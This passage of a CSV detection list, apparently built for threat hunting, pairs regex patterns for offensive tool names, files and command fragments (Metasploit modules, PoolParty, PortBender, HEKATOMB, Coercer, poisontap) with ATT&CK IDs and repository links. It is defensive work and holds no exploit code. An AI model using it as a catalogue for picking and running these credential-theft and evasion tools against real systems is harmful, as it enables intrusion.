tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.reg*",".{0,1000}poc\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.run*",".{0,1000}poc\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.sh*",".{0,1000}poc\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.vb*",".{0,1000}poc\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.vbe*",".{0,1000}poc\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.vbs*",".{0,1000}poc\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.vbscript*",".{0,1000}poc\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.zsh*",".{0,1000}poc\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*POC_CloudFilter_ArbitraryFile_EoP*",".{0,1000}POC_CloudFilter_ArbitraryFile_EoP.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*POC_CloudFilter_ArbitraryFile_EoP.*",".{0,1000}POC_CloudFilter_ArbitraryFile_EoP\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*POC1*implant.cpp*",".{0,1000}POC1.{0,1000}implant\.cpp.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*POC2*implant.cpp*",".{0,1000}POC2.{0,1000}implant\.cpp.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*pocs_go/*/CVE-*.go*",".{0,1000}pocs_go\/.{0,1000}\/CVE\-.{0,1000}\.go.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*podalirius@protonmail.com*",".{0,1000}podalirius\@protonmail\.com.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*podalirius@protonmail.com*",".{0,1000}podalirius\@protonmail\.com.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*podman run * --name avred -d avred*",".{0,1000}podman\srun\s.{0,1000}\s\-\-name\savred\s\-d\savred.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by an Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*poetry run bofhound*",".{0,1000}poetry\srun\sbofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*poetry run hekatomb*",".{0,1000}poetry\srun\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a 
python script that connects to an LDAP directory to retrieve all computer and user information. It then downloads all DPAPI blobs of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*poetry run NetExec *",".{0,1000}poetry\srun\sNetExec\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*PointAndPrint.ps1*",".{0,1000}PointAndPrint\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*poison_ivy_c2*",".{0,1000}poison_ivy_c2.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Poisoners-Session.log*",".{0,1000}Poisoners\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*poisonivy_bof.*",".{0,1000}poisonivy_bof\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*poisontap*",".{0,1000}poisontap.{0,1000}","offensive_tool_keyword","poisontap","PoisonTap - siphons cookies. exposes internal router & installs web backdoor on locked computers","T1534.002 - T1059.001 - T1053.005 - T1564.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/samyk/poisontap","1","0","N/A","N/A","10","6125","995","2018-11-26T16:50:44Z","2016-11-16T11:51:34Z" "*PoisonTendy.dll*",".{0,1000}PoisonTendy\.dll.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*polenum *-protocols *",".{0,1000}polenum\s.{0,1000}\-protocols\s.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*polenum -h*",".{0,1000}polenum\s\-h.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*pony-02.aftxt*",".{0,1000}pony\-02\.aftxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit 
is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PoolParty attack completed successfully*",".{0,1000}PoolParty\sattack\scompleted\ssuccessfully.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*PoolParty attack completed successfully*",".{0,1000}PoolParty\sattack\scompleted\ssuccessfully.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*PoolParty.exe *",".{0,1000}PoolParty\.exe\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread 
Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*PoolPartyBof *",".{0,1000}PoolPartyBof\s.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*PoolPartyBof * HTTPSLocal*",".{0,1000}PoolPartyBof\s.{0,1000}\sHTTPSLocal.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*PoolPartyBof.cna*",".{0,1000}PoolPartyBof\.cna.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*PoolPartyBof-main*",".{0,1000}PoolPartyBof\-main.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*PoolParty-main.zip*",".{0,1000}PoolParty\-main\.zip.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" 
"*PoolParty-PoolParty.zip*",".{0,1000}PoolParty\-PoolParty\.zip.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*pornhub.py*",".{0,1000}pornhub\.py.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*port_forward_pivot.py*",".{0,1000}port_forward_pivot\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - 
Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*port_scanner_ip_obj.py*",".{0,1000}port_scanner_ip_obj\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*port_scanner_regex.py*",".{0,1000}port_scanner_regex\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*PortBender backdoor*",".{0,1000}PortBender\sbackdoor.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender redirect*",".{0,1000}PortBender\sredirect.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.cna*",".{0,1000}PortBender\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 
- T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.cpp*",".{0,1000}PortBender\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*portbender.dll*",".{0,1000}portbender\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.exe*",".{0,1000}PortBender\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.h*",".{0,1000}PortBender\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 